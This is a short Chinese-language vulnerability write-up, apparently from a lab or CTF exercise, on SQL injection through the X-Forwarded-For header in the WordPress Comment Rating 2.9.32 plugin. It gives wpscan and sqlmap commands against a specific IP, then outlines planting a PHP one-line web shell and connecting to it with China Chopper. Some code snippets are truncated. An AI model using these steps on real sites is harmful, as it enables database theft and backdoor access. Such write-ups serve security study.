最具挑战性的挑战莫过于提升自我。——迈克尔·F·斯特利
漏洞名称:
WordPress Plugin Comment Rating 2.9.32 SQL注入漏洞
漏洞描述:
wordpress中的comment-rating2.9.32插件中的ck-processkarma.php文件存在HTTP_X_FORWARDED_FOR header inject Vulnerability
漏洞等级
高级
漏洞检测方法:
wpscan扫描
漏洞利用方法:
- 浏览网页,发现是WordPress网站
2.使用wpscan进行扫描
1 | wpscan -u "http://219.153.49.228:48606/" --enumerate vp |
得出comment-rating插件存在SQL注入漏洞
1 | +] Name: comment-rating - v2.9.32 |
3.查看 https://www.exploit-db.com/exploits/24552/, 根据其介绍的知是HTTP_X_FORWARDED_FOR header注入漏洞。
1 | Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php |
4.EDB提供的POC,但我本地尝试运行这个POC并未成功,所以构造语句,使用sqlmap进行查询
1 | <?PHP |
5.查询语句为:
1 | sqlmap "http://219.153.49.228:40602/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a&imgIndex=1_14_" -f |
然后查出库名,表名,列名,字段名,这个很简单,我就不多说啦。
6,然后登陆账号,在插件中添加PHP一句话木马,记得开启插件功能
7,菜刀连接木马即可获取shell.
漏洞修复方案:
及时更新插件